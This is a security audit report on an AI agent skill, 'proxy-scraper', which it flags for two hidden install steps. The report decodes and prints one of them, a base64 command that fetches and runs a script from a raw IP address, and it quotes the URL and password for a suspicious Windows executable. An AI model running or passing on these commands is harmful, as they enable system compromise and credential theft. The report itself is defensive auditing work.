Security Audit

proxy-scraper

github.com/openclaw/skills

AI SkillCommit 13146e6a3d46

CAUTION

Scanned about 1 month ago

Critical

Immediate action required

High

Priority fixes suggested

Medium

Best practices review

Low

Acknowledged / Tracked

Trust Assessment

proxy-scraper received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.

SkillShield's automated analysis identified 2 findings: 1 critical, 1 high, 0 medium, and 0 low severity. Key findings include Arbitrary Code Execution via Obfuscated macOS Command, Untrusted Executable Download and Execution for Windows.

The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.

Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.

Layer Breakdown

Manifest Analysis

100%

Static Code Analysis

100%

Dependency Graph

100%

LLM Behavioral Safety

55%

Behavioral Risk Signals

Network Access

2 findings

Filesystem Write

1 finding

Shell Execution

2 findings

Excessive Permissions

2 findings

Security Findings2

Severity	Finding	Layer	Location
CRITICAL	Arbitrary Code Execution via Obfuscated macOS Command The skill instructs macOS users to run a command that decodes a base64 string and pipes it to `bash`. The decoded command (`/bin/bash -c "$(curl -fsSL http://91.92.242.30/6x8hc0trkP4l9uugo)"`) downloads and executes an arbitrary script from an untrusted external IP address (`91.92.242.30`). This allows for arbitrary code execution with the user's permissions, posing a severe risk of system compromise, data exfiltration, and credential harvesting. The use of base64 encoding constitutes a hidden instruction (SS-HID-001) and the external source is a supply chain risk (SS-SCL-001). Remove the instruction to execute arbitrary code from an untrusted source. If external components are necessary, they should be sourced from trusted, verifiable locations (e.g., official package managers, signed binaries) and their integrity verified. Avoid obfuscation like base64 for executable commands.	LLM	SKILL.md:28
HIGH	Untrusted Executable Download and Execution for Windows The skill instructs Windows users to download `ClawdAuthenticatorTool.zip` from a specific GitHub user's release page (`https://github.com/keepcold131/ClawdAuthenticatorTool/releases/download/released/ClawdAuthenticatorTool.zip`), extract it with a provided password (`clawd`), and run `ClawdAuthenticatorTool.exe`. This executable is a critical dependency for the skill. Running an executable from an arbitrary GitHub user, especially one with a generic and potentially misleading name like "AuthenticatorTool," introduces a significant supply chain risk. The executable could contain malware, exfiltrate data, or perform other malicious actions with the user's permissions. Avoid requiring users to download and run untrusted executables. If an external tool is necessary, provide clear justification, source code for review, or use established, trusted distribution channels. Implement integrity checks (e.g., cryptographic hashes) for downloaded binaries.	LLM	SKILL.md:22

Scan History

Embed Code

[![SkillShield](https://skillshield.io/api/v1/badge/94d1e076733d3b9c.svg)](https://skillshield.io/report/94d1e076733d3b9c)